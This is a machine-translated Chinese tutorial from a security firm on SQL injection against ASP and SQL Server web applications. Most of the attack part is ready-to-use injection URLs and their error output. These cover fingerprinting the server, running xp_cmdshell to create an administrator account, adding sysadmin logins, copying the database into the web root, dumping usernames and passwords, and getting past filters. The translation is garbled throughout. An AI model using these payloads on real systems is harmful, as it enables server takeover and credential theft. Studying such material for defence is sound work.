SQL Server injection attack, introduced the WEB

With the B / S model of the development of application development, the use of this mode of programmers to write

applications more and more. However, due to the entry threshold of the industry is not high, the level and

experience of programmers also uneven, a large portion of programmers writing code at the time, there is no user

input data to determine the legality of, so that the existence of security applications. Users can submit code for

some database query, according to the procedures to return the results, he would like to know some of the data, and

this is the so-called SQL injection (SQL injection).

SQL injection attacks are attacks on a regular basis, it can allow some unscrupulous users to search your data,

change the server settings, or when you do not care and out of your server. SQL injection attacks is not a SQL

Server problem, but inappropriate procedures. If you want to run these programs, you must understand that despite
a certain degree of risk.

First, the principle of

Understanding of SQL injection should first understand some basic prior to the B / S mode of application of

knowledge, as well as cross-browser and server knowledge. In accordance with national conditions, the website of

domestic ASP + Access or SQL Server account for more than 70%, PHP + MySQL 20%, less than 10% of the

other. ASP + SQL Server for the application structure, an ASP process is a SQL Server client, it requires a

legitimate SQL login name and password to connect to SQL Server database. The following is a typical piece of
code in ASP to connect SQL SERVER examples:

<% rServer = "IBM-WEB-01" 'set up SQL SERVER server address

rUid = "webuser" 'set up SQL SERVER login

rPwd = "xxxxxxxxf" 'set up SQL SERVER Password

rDatabase = "sitelog" 'set up SQL SERVER Database Name

set conn = Server.CreateObject ( "ADODB.Connection")

strconn = "driver = (sql server); server =" & rServer & "; uid =" & rUid & "; pwd =" & rPWD & "; database =" &
rDatabase
conn.open strconn%>

SQL injection vulnerability point occurred in the process developer to construct a WHERE clause along with the

time of the user's input. For example, the following is a list of a simple ASP program article_show.asp, its function

is obtained with the GET parameters, according to ID database info_article table shows the corresponding ID value
of the contents of the article.

<% strID = Trim (Request.QueryString ( "ID"))

strSQL = "select * from info_article where ID =" & strID

set rs = server.CreateObject ( "ADODB.Recordset")

rs.open strSQL, conn, 1,3%>

<table width="100%" border="0" cellpadding="10" cellspacing="1" class="table1">

<tr class="trtitle">

<td> <div align="center"> <% = rs ( "title ")%>< br> </ div> </ td>
</ tr>

<tr class="trcontent">

<td> <% = rs ( "content ")%></ td>

</ tr>
</ table>

Please note strSQL = "select * from info_article where ID =" & strID this sentence. Actual run-time, the client

should use a URL similar to this http://www.abc.com/article_show.asp?ID=12 access the ASP program, when the

ID is the number 12, strID character of the value of "12" , VBScript in the "&" operator can connect any type of

data connection through & can get the value of strSQL string: select * from info_article where ID = 12, we can see

that this is a normal SQL statement. VBScript is a weakly typed languages, variables do not have the type of

statement (even without the variable declaration), which sometimes will bring convenience to programmers, but

also easy to process in the programming can be used a lot of loopholes. Since this procedure is not limited to the
type of variable strID a result, this procedure SQL injection vulnerability.

Second, testing

Now try to enter in the browser the following URL

http://www.abc.com/article_show.asp?ID=12 '

Analog introduced at this time to be above the value of strSQL string:

select * from info_article where ID = 12 '

This is a SQL Server query illegal. Then the server will return the following error:
Microsoft OLE DB Provider for ODBC Drivers error'80040e14 '

[Microsoft] [ODBC SQL Server Driver] [SQL Server] string''is not closed before the quotation marks.

This error has been full of this Web site can be injected into the attack.

In some cases the server shows that "when dealing with the server URL error" because the closure of the IIS

settings to the client to send a detailed error message, not necessarily at this time can not be injected, but the
relatively great difficulties, the only luck.

In some cases the content server to display the contents of ID = 12, there is no error message, it may be filtered
developers of single quotation marks, you can use the following methods to try:

article_show.asp? ID = 12 and 1 = 2

At this point if there is the following error, it is possible to carry out injections.

Error'80020009 '

Accidents.

Note: the following error message appears when injected certainly can not be completed:

Microsoft VBScript runtime error Error'800a000d '

Type mismatch: 'cint'

Microsoft VBScript runtime error Error'800a000d '

Type mismatch: 'clng'

Microsoft VBScript runtime error Error'800a000d '

Type mismatch: 'cdbl'

Microsoft VBScript runtime error Error'800a000d '

Type mismatch: 'c'

Illegal parameter values.

Please enter the correct parameter values.

ADODB.Parameter error'800a0d5d '

Application uses a value of the wrong type for the current operation.

Third, the collection of information

Identified can be implemented into the attack, you can use the following methods on the server for testing.

Test SQL Server Version:

article_show.asp? ID = (SELECT @ @ VERSION)

Return to:

Microsoft OLE DB Provider for ODBC Drivers error'80040e07 '

[Microsoft] [ODBC SQL Server Driver] [SQL Server] the nvarchar value 'Microsoft SQL Server 2000 - 8.00.760

(Intel X86) Dec 17 2002 14:22:05 Copyright (c) 1988-2003 Microsoft Corporation Enterprise Edition on Windows
NT 5.0 (Build 2195: Service Pack 4) 'is converted to data type int columns for the syntax error occurred.

Testing the current SQL Server login user name:

article_show.asp? ID = (USER_NAME ())

Return to:

Microsoft OLE DB Provider for ODBC Drivers error'80040e07 '

[Microsoft] [ODBC SQL Server Driver] [SQL Server] the nvarchar value 'webuser' is converted to data type int
columns for the syntax error occurred.

Note: If the sa login is here will appear in dbo.

Tests currently in use SQL Server database name:

article_show.asp? ID = (DB_NAME ())

Return to:
Microsoft OLE DB Provider for ODBC Drivers error'80040e07 '

[Microsoft] [ODBC SQL Server Driver] [SQL Server] the nvarchar value 'sitelog' is converted to data type int
columns for the syntax error occurred.

Test whether the current user "sysadmin" group

SELECT IS_SRVROLEMEMBER ( 'sysadmin')

This SQL statement can be used to test whether the user currently logged on to the sysadmin server role, if the

return value is 1, then the return value is not 0. Here to change its character in order to see the specific numerical

data. So write the following URL: (one char (115) for the characters' s',% 2B for the plus sign (+) of the UTF-8
encoding.)

article_show.asp? ID = (SELECT CHAR (115)% 2B CAST (IS_SRVROLEMEMBER ( 'sysadmin') AS

VARCHAR (2)))

Return to:

Microsoft OLE DB Provider for ODBC Drivers error'80040e07 '

[Microsoft] [ODBC SQL Server Driver] [SQL Server] the varchar value 's0' is converted to data type int columns
for the syntax error occurred.

If'0 'is not' sysadmin 'group members, if it is'1' is the 'sysadmin' group.

Test whether the current user "db_owner" group.

article_show.asp? ID = (SELECT CHAR (115)% 2B CAST (IS_MEMBER ( 'db_owner') AS VARCHAR (2)))

Return to:

Microsoft OLE DB Provider for ODBC Drivers error'80040e07 '

[Microsoft] [ODBC SQL Server Driver] [SQL Server] the varchar value 's1' is converted to data type int columns
for the syntax error occurred.

This has access to a lot of valuable information. If the test for the current user a member of the sysadmin group,

then there is the possibility of a large can on this SQL Server to run cmd shell. If it is db_owner of the current can
be connected to any database operation, such as new tables, delete tables, insert data, read data and so on.
Fourth, sysadmin users can carry out the operation

Note: The following details on the server is no longer an error message, only the SQL statement can be used.

Add a NT users:

article_show.asp? ID = 12; EXEC master .. xp_cmdshell "net user name password / add" --

The user is added to the administrators group

article_show.asp? ID = 12; EXEC master .. xp_cmdshell "net localgroup name administrators / add" --

Will do a complete database backup directory on the web site for download:

article_show.asp? ID = 12; BACKUP DATABASE database name to DISK = 'c: \ Inetpub \ wwwroot \ 1.db'; --

Add a SQL Server login:

article_show.asp? ID = 12; EXEC sp_addlogin 'uname', 'pwd' --

Login to add to the db_owner role:

article_show.asp? ID = 12; EXEC sp_adduser 'uname', 'db_owner' --

Login to add to the sysadmin fixed server role:

article_show.asp? ID = 12; EXEC sp_addsrvrolemember 'uname', 'sysadmin' --

The opposite operation:

Sign of the sysadmin fixed server role from the deletion of:

article_show.asp? ID = 12; EXEC sp_dropsrvrolemember 'uname', 'sysadmin' --

Login to remove from the db_owner role:

article_show.asp? ID = 12; EXEC sp_dropuser 'uname', 'db_owner' --

The deletion of the registry:

article_show.asp? ID = 12; EXEC sp_droplogin 'uname' --

Above the general operation of the server will appear below the normal display of information or the ID = 12 web
page:

Error'80020009 '

Accidents.

Fifth, the general authority to carry out the operation of users:

Ordinary users can not use the command listed in the fourth quarter, but still读出数据all the data library.

Use the following statements are listed in the database the first table name:

article_show.asp? ID = (SELECT TOP 1 NAME FROM SYSOBJECTS WHERE XTYPE = 'U' AND STATUS> 0
AND NAME NOT IN (''))

Be the first info_files called after a table, with the following statement to be the second table:

article_show.asp? ID = (SELECT TOP 1 NAME FROM SYSOBJECTS WHERE XTYPE = 'U' AND STATUS> 0
AND NAME NOT IN ( 'info_files'))

The second table to be named after info_articles, with the following statement to be the third table:

article_show.asp? ID = (SELECT TOP 1 NAME FROM SYSOBJECTS WHERE XTYPE = 'U' AND STATUS> 0
AND NAME NOT IN ( 'info_files',' info_articles'))

Assumptions have been called the third form info_users

Use the following table info_users statement to be the first name field:

article_show.asp? ID = (SELECT COL_NAME (OBJECT_ID ( 'info_users'), 1)

Use the following table info_users statement to be the second field name:

article_show.asp? ID = (SELECT COL_NAME (OBJECT_ID ( 'info_users'), 2)

The assumption that the structure be info_users for ID, username, password, then use the following statement be
recorded in the first username value:

article_show.asp? ID = (SELECT TOP 1 username FROM info_users)

With the following statement be recorded in the first password value:

article_show.asp? ID = (SELECT TOP 1 password FROM info_users)

Use the following statement be recorded in the first ID value:

article_show.asp? ID = (SELECT TOP 1 CHAR (115)% 2B CAST (ID AS VARCHAR (2)) FROM info_users)

Sixth, the annotated

There are many developers using filter 'its way to "prevent" injection vulnerabilities, but can still make use of

relevant functions, to bypass the restrictions on the purpose of the procedure. For example take a look at how the
transformation of these words:

Simple, such as where xtype = 'U', the corresponding ASCII character code U is 85, so can be used where xtype =

char (85) in place of; if the characters are in Chinese, such as where name = 'user', can be used where name = nchar
(29992) + nchar (25143) to replace.

Some people will filter Select, Update, Delete these keywords, but just forget the case-sensitive, so we can try to
use this selecT.

Do not expect people in the field, we might as well look at the site of the login form, the general sake of
convenience, the form field names with the same input name check box.

Special Note: the address bar into the + process interpreted as a space,% 2B + No. interpreted as,% as% No. 25,
specifically refer to the relevant URLEncode introduced.

Get into the methods used when, IIS will put you to submit all of the strings, the Post method does not record, so
can not Post's website as far as possible Get.

SQL Server injection attack described above is not limited to these methods can be used a lot of their own SQL

statement to be clever information you want. The installation of SQL Server can be found after the "SQL Server

line from the book" SQL Server can be found here, all the statements, functions, system stored procedures and

security of documents, is a very good reference.

Yung-based enterprise network security division
Sales Hotline :010-58731818
Customer Service Hotline :800-858-1121

Fuente: http://translate.google.com.ec/translate?hl=en&sl=zh-CN&u=http://www.rj-
itop.com/gonggao.php%3Fid%3D4633&ei=2HdBStmhNYmQkAXH-
Kz7CA&sa=X&oi=translate&resnum=3&ct=result&prev=/search%3Fq%3Dselect%2B
top%2B1%2Bchar(*)%26hl%3Den%26sa%3DN%26start%3D30